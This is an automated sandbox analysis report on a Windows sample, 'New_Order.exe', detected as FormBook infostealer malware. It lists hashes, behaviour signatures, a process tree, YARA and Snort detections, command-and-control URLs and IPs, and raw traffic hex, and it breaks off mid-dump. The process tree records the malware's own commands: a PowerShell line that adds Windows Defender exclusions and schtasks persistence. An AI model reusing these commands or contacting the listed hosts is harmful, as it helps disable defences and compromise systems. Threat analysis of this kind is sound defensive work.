Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New_Order.exe

Overview

General Information

Sample Name:New_Order.exe
Analysis ID:1352630
MD5:e63f894ae694122fe230d5a91250bc1f
SHA1:7822c03997f535ed9db4b3eccf480924686cb995
SHA256:1317668c84b4e2fdd8e6341a252f45bb44cfeeea05b11a2e1918f3f4afadc935
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Scheduled temp file as task from temp location
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • New_Order.exe (PID: 7360 cmdline: C:\Users\user\Desktop\New_Order.exe MD5: E63F894AE694122FE230D5A91250BC1F)
    • powershell.exe (PID: 7536 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New_Order.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7584 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QjSljS.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7656 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpBC11.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • New_Order.exe (PID: 7820 cmdline: C:\Users\user\Desktop\New_Order.exe MD5: E63F894AE694122FE230D5A91250BC1F)
    • New_Order.exe (PID: 7828 cmdline: C:\Users\user\Desktop\New_Order.exe MD5: E63F894AE694122FE230D5A91250BC1F)
    • New_Order.exe (PID: 7840 cmdline: C:\Users\user\Desktop\New_Order.exe MD5: E63F894AE694122FE230D5A91250BC1F)
      • MxIFbOJlQLdXkFqAx.exe (PID: 1856 cmdline: "C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • wextract.exe (PID: 8188 cmdline: C:\Windows\SysWOW64\wextract.exe MD5: B9CC7E24DB7DE2E75678761B1D8BAC3E)
          • MxIFbOJlQLdXkFqAx.exe (PID: 2492 cmdline: "C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7832 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • QjSljS.exe (PID: 7860 cmdline: C:\Users\user\AppData\Roaming\QjSljS.exe MD5: E63F894AE694122FE230D5A91250BC1F)
    • schtasks.exe (PID: 8108 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpCEFD.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • QjSljS.exe (PID: 8152 cmdline: C:\Users\user\AppData\Roaming\QjSljS.exe MD5: E63F894AE694122FE230D5A91250BC1F)
    • QjSljS.exe (PID: 8160 cmdline: C:\Users\user\AppData\Roaming\QjSljS.exe MD5: E63F894AE694122FE230D5A91250BC1F)
    • QjSljS.exe (PID: 8168 cmdline: C:\Users\user\AppData\Roaming\QjSljS.exe MD5: E63F894AE694122FE230D5A91250BC1F)
      • MxIFbOJlQLdXkFqAx.exe (PID: 5844 cmdline: "C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • wextract.exe (PID: 3552 cmdline: C:\Windows\SysWOW64\wextract.exe MD5: B9CC7E24DB7DE2E75678761B1D8BAC3E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ac33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x16e82:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x27840:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13a8f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 19 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        10.2.New_Order.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          10.2.New_Order.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2ac33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16e82:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          10.2.New_Order.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            10.2.New_Order.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x29e33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16082:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpBC11.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpBC11.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\New_Order.exe, ParentImage: C:\Users\user\Desktop\New_Order.exe, ParentProcessId: 7360, ParentProcessName: New_Order.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpBC11.tmp, ProcessId: 7656, ProcessName: schtasks.exe

            Snort Signatures

            Timestamp:192.168.2.4185.151.30.13849744802855465 12/03/23-16:26:16.668057
            SID:2855465
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4172.67.184.7349764802855465 12/03/23-16:27:43.947745
            SID:2855465
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.437.97.254.2749760802855465 12/03/23-16:27:21.256906
            SID:2855465
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4109.68.33.2549748802855465 12/03/23-16:26:38.894529
            SID:2855465
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.491.195.240.9449739802855465 12/03/23-16:25:44.407183
            SID:2855465
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4202.172.28.20249768802855465 12/03/23-16:28:29.296841
            SID:2855465
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.452.68.224.12649756802855465 12/03/23-16:27:06.930079
            SID:2855465
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.466.29.155.5449752802855465 12/03/23-16:26:52.795950
            SID:2855465
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: New_Order.exeReversingLabs: Detection: 67%
            Source: New_Order.exeVirustotal: Detection: 68%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 10.2.New_Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.New_Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.4168479789.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4166481175.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1853449511.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1910322852.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.1910549824.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.4166642046.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4166636409.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1865768536.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Antivirus detection for URL or domain
            Source: http://www.fdissolutions.net/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=inoojyPYY1WC9wcQL3KibnMAdvhtstHROTevXGeSx6okq+Nf2nPGtK9KaHajuwb+0LfF1HdY3MAFMtPUKPMp3iU3/gDoogh+Wg==Avira URL Cloud: Label: malware
            Source: http://www.poria.link/fdo5/?540H2x=xa2waNrdOCjpAmfef8jorByukH+EVFd5YbvOdmGsq1/UoTy2yLdiy8uLwcrb3pQUM2TyiZx+d9zg30LTCTeZqohwWyqWM8Qwrg==&fXUX=ShJ8DFcXvtj84pwAvira URL Cloud: Label: malware
            Source: http://www.quote2bill.com/fdo5/Avira URL Cloud: Label: malware
            Source: http://www.wrautomotive.online/fdo5/Avira URL Cloud: Label: malware
            Source: http://www.busan3-200.com/fdo5/Avira URL Cloud: Label: malware
            Source: http://www.poria.link/fdo5/Avira URL Cloud: Label: malware
            Source: http://www.pay4dance.xyz/fdo5/?540H2x=5TdxL1jawfl3Ka3qvJ6r7WEnhl9d9FSMp+F3J8Z8WOIoZyaqSH32l6+4J8Kvi3fjVro4t5UeAoiyMZT16OgV/jIcRYbasIDnmQ==&fXUX=ShJ8DFcXvtj84pwAvira URL Cloud: Label: phishing
            Source: http://www.busan3-200.com:80/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=o5wSqUvF0rpSj/QsxVSIlr771lB1q2yaUAvira URL Cloud: Label: malware
            Source: http://www.pay4dance.xyz/fdo5/Avira URL Cloud: Label: phishing
            Source: http://www.wrautomotive.online/fdo5/?540H2x=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&fXUX=ShJ8DFcXvtj84pwAvira URL Cloud: Label: malware
            Source: http://www.quote2bill.com/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=EAzFkHRwipdrFLRPzn8XfH22pTdKYWJnyl4LcH+flh+EU/cAs0/QFXMo9vl/d0UKRaBGjYTaeopZ/0cAzgqORqEzisMthiMtgw==Avira URL Cloud: Label: malware
            Source: http://www.busan3-200.com/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=o5wSqUvF0rpSj/QsxVSIlr771lB1q2yaUHYHmevxRJiNXHXH1dMi1Tu8dx6k0Oesk6U+KD/q+MB1YEvRLC9XlweWTzImNrywBQ==Avira URL Cloud: Label: malware
            Source: http://www.fdissolutions.net/fdo5/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: wrautomotive.onlineVirustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeReversingLabs: Detection: 67%
            Machine Learning detection for sample
            Source: New_Order.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeJoe Sandbox ML: detected
            Source: New_Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: New_Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: firefox.pdbP source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wextract.pdb source: New_Order.exe, 0000000A.00000002.1848954122.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4165809327.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, QjSljS.exe, 00000012.00000002.1907867203.0000000000F97000.00000004.00000020.00020000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000002.4165108580.0000000000688000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: JkC.pdbSHA256 source: New_Order.exe, QjSljS.exe.0.dr
            Source: Binary string: wextract.pdbGCTL source: New_Order.exe, 0000000A.00000002.1848954122.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4165809327.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, QjSljS.exe, 00000012.00000002.1907867203.0000000000F97000.00000004.00000020.00020000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000002.4165108580.0000000000688000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: JkC.pdb source: New_Order.exe, QjSljS.exe.0.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4165599306.0000000000CDE000.00000002.00000001.01000000.0000000D.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000000.1816147347.0000000000CDE000.00000002.00000001.01000000.0000000D.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4165740008.0000000000CDE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: New_Order.exe, 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167101706.000000000524E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.1845191923.0000000004D52000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.1853417520.0000000004F07000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167101706.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000002.1910678293.000000000497E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000003.1908946698.0000000004638000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000015.00000002.1910678293.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000003.1906920518.000000000448A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: New_Order.exe, New_Order.exe, 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167101706.000000000524E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.1845191923.0000000004D52000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.1853417520.0000000004F07000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167101706.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000002.1910678293.000000000497E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000003.1908946698.0000000004638000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000015.00000002.1910678293.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000003.1906920518.000000000448A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmp

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49739 -> 91.195.240.94:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49744 -> 185.151.30.138:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49748 -> 109.68.33.25:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49752 -> 66.29.155.54:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49756 -> 52.68.224.126:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49760 -> 37.97.254.27:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49764 -> 172.67.184.73:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49768 -> 202.172.28.202:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.pay4dance.xyz
            Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
            Source: Joe Sandbox ViewASN Name: TRANSIP-ASAmsterdamtheNetherlandsNL TRANSIP-ASAmsterdamtheNetherlandsNL
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlserver: Microsoft-IIS/10.0x-powered-by: ASP.NETdate: Sun, 03 Dec 2023 15:26:30 GMTcontent-length: 1245connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlserver: Microsoft-IIS/10.0x-powered-by: ASP.NETdate: Sun, 03 Dec 2023 15:26:32 GMTcontent-length: 1245connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 